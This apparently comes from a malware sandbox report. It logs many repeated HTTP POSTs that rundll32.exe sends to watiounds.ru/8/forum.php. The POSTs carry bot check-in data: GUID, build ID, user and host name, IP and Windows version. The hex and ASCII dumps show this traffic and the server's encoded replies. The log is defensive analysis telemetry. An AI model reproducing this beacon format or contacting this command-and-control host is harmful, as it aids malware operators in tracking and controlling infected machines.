                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          200 | 192.168.2.22 | 49365 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:55.218905926 CEST | 259 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:55.341022968 CEST | 259 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNHSMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          201 | 192.168.2.22 | 49366 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:55.684127092 CEST | 260 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:55.806865931 CEST | 260 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNVEMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          202 | 192.168.2.22 | 49367 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:56.126389980 CEST | 261 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:56.247766972 CEST | 261 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHBYSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          203 | 192.168.2.22 | 49368 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:56.568721056 CEST | 262 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:56.693118095 CEST | 263 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFMNUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          204 | 192.168.2.22 | 49369 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:57.005903006 CEST | 263 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:57.128365993 CEST | 264 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMJQNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          205 | 192.168.2.22 | 49370 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:57.440504074 CEST | 264 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:57.562568903 CEST | 265 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBYBYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          206 | 192.168.2.22 | 49371 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:57.876368046 CEST | 266 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:57.998512030 CEST | 266 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          207 | 192.168.2.22 | 49372 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:58.314071894 CEST | 267 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:58.437741041 CEST | 267 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKTGPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          208 | 192.168.2.22 | 49373 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:58.760061026 CEST | 268 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:58.889681101 CEST | 268 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 5a 41 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJZAQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          209 | 192.168.2.22 | 49374 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:59.206846952 CEST | 269 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:59.330724955 CEST | 269 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          21 | 192.168.2.22 | 49186 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:32.824532032 CEST | 58 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:32.948359013 CEST | 59 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          210 | 192.168.2.22 | 49375 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:59.654381037 CEST | 270 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:59.782692909 CEST | 270 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          211 | 192.168.2.22 | 49376 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:00.097728968 CEST | 271 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:00.221044064 CEST | 271 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 51 4a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNQJMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          212 | 192.168.2.22 | 49377 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:00.547456980 CEST | 272 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:00.670063019 CEST | 273 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMTGNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          213 | 192.168.2.22 | 49378 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:00.989937067 CEST | 273 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:01.112196922 CEST | 274 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVYBEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          214 | 192.168.2.22 | 49379 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:01.437752962 CEST | 275 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:01.566643953 CEST | 275 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4a 51 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTJQGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          215 | 192.168.2.22 | 49380 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:01.904135942 CEST | 276 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:02.033128023 CEST | 276 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
